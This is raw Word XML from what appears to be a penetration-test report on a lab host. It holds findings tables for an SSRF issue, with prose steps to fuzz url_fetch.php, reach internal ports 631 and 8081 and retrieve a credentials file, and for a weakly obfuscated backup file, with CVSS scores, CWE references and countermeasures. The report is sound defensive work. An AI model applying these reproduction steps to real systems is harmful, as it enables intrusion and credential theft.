                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Access url_fetch.php, fuzz the url parameter to enumerate internal ports and paths, identify services on 631 and 8081, discover config.txt on the internal service, retrieve it through the fetch function, and observe that it exposes sensitive credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0912" w:rsidRPr="00D77DFE" w14:paraId="3FDCF20A"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4EAD43E" w14:textId="1BB01865" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E0912">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3E0912" w:rsidRPr="00D77DFE" w14:paraId="4F356A2B" w14:textId="77777777" w:rsidTr="00094048">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FD1D06B" w14:textId="47D9BBB8" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E0912">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Proof of Concept evidence is provided in Appendix A</w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureA8" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:noProof/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t xml:space="preserve">, Figure A.8 </w:t>
              </w:r>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>SSRF that accesses internal services (ports 631 and 8081)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E0912" w:rsidRPr="00D77DFE" w14:paraId="51E7F8A7" w14:textId="77777777" w:rsidTr="00094048">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273DCBD" w14:textId="77777777" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="003E0912">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3E0912" w:rsidRPr="00D77DFE" w14:paraId="7AA88FEC" w14:textId="77777777" w:rsidTr="00094048">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3C07DD8" w14:textId="583CB7AF" w:rsidR="003E0912" w:rsidRPr="00D77DFE" w:rsidRDefault="003E0912" w:rsidP="00760AE4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId42" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://portswigger.net/web-security/ssrf</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00760AE4" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> , </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://cwe.mitre.org/data/definitions/918.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0877C313" w14:textId="77777777" w:rsidR="006F08D7" w:rsidRPr="00D77DFE" w:rsidRDefault="006F08D7" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62405008" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>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00764E" w:rsidRPr="00D77DFE" w14:paraId="55AADEB6" w14:textId="77777777" w:rsidTr="007B6EB7">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BDC836D" w14:textId="77777777" w:rsidR="0000764E" w:rsidRPr="00D77DFE" w:rsidRDefault="0000764E" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E2841" w:themeColor="text2"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Weak obfuscation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000764E" w:rsidRPr="00D77DFE" w14:paraId="56B68760" w14:textId="77777777" w:rsidTr="007B6EB7">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72EDE89" w14:textId="77777777" w:rsidR="0000764E" w:rsidRPr="00D77DFE" w:rsidRDefault="0000764E" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing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C1BEF41" w14:textId="77777777" w:rsidR="0000764E" w:rsidRPr="00D77DFE" w:rsidRDefault="0000764E" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing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Risk Rating:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000764E" w:rsidRPr="00D77DFE" w14:paraId="1FDB4807"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37443F8" w14:textId="08B71E0A" w:rsidR="0000764E" w:rsidRPr="00D77DFE" w:rsidRDefault="0000764E" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>VUL_09</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E604F9F" w14:textId="77777777" w:rsidR="0000764E" w:rsidRPr="00D77DFE" w:rsidRDefault="0000764E" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251761664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="67DA98D4" wp14:editId="6B6130C5">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>825500</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>53975</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="371558649"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chemeClr val="accent2"/>
                              </a:solidFill>
                              <a:ln w="9525">
                                <a:solidFill>
                                  <a:schemeClr val="accent2"/>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517564" id="Rectangle: Rounded Corners 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:65pt;margin-top:4.25pt;width:125.8pt;height:10.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" fillcolor="#e97132 [3205]" strokecolor="#e97132 [3205]">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000764E" w:rsidRPr="00D77DFE" w14:paraId="7615AC19"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A66F009" w14:textId="77777777" w:rsidR="0000764E" w:rsidRPr="00D77DFE" w:rsidRDefault="0000764E" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing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CVSS: 7.2</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A136BA7" w14:textId="77777777" w:rsidR="0000764E" w:rsidRPr="00D77DFE" w:rsidRDefault="0000764E" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CWE:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0000764E" w:rsidRPr="00D77DFE" w14:paraId="3C2B447E" w14:textId="77777777" w:rsidTr="007B6EB7">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8783165" w14:textId="77777777" w:rsidR="0000764E" w:rsidRPr="00D77DFE" w:rsidRDefault="0000764E" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>AC:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>PR:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>UI:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/S:C/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>C:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>I:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>A:L</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/E:P/RL:O</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60BC256" w14:textId="77777777" w:rsidR="0000764E" w:rsidRPr="00D77DFE" w:rsidRDefault="0000764E" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CWE-649: Reliance on Obfuscation or Encryption of Security-Relevant Inputs without Integrity Checking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="185A1789"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2EF7B4D" w14:textId="4A8956F7" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00D84933">
            <w:pPr>
              <w:spacing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Tools Used:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="3D29D909"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A3638B1" w14:textId="6B11930B" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Browser, CyberCheff </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="23045AC2" w14:textId="77777777" w:rsidTr="007B6EB7">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FD9D670" w14:textId="372C09C1" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability Description: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="3ED1962C" w14:textId="77777777" w:rsidTr="00760AE4">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3F450EE" w14:textId="097AFC6A" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Sensitive internal data is publicly accessible and weakly obfuscated, allowing disclosure of critical information, including CVE references.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="77BCA67F"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5FD769F" w14:textId="126CAF7F" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vulnerable URLs / IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="03D0D7A1"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99D54F3" w14:textId="3F979194" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>http://10.0.2.178:8080/stocznia/_backup/file.bak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="2781ACC9"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1E19E45" w14:textId="4BC41C5A" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:after="0"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Implications / Consequences of not Fixing the Issue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="029290A8"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462EFB4" w14:textId="3D807FB1" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Exposes sensitive internal data, enabling targeted attacks using known CVEs and internal information, and weakens overall security by creating a false sense of protection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="7C4A7200"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tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D3DFEE"/>
          </w:tcPr>
          <w:p w14:paraId="297B5A78" w14:textId="45FEBDA2" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:after="0"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Suggested Countermeasures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00377507" w:rsidRPr="00D77DFE" w14:paraId="6303C1AC"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5352051" w14:textId="77777777" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Remove the file or restrict its access so it is not publicly reachable.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="322590AE" w14:textId="77777777" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Avoid storing sensitive data in web-accessible directories, even if obfuscated.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710835C5" w14:textId="662C211A" w:rsidR="00377507" w:rsidRPr="00D77DFE" w:rsidRDefault="00377507" w:rsidP="00377507">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Use strong encryption with proper key management for any necessary storage, rather than reversible encoding or simple obfuscation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
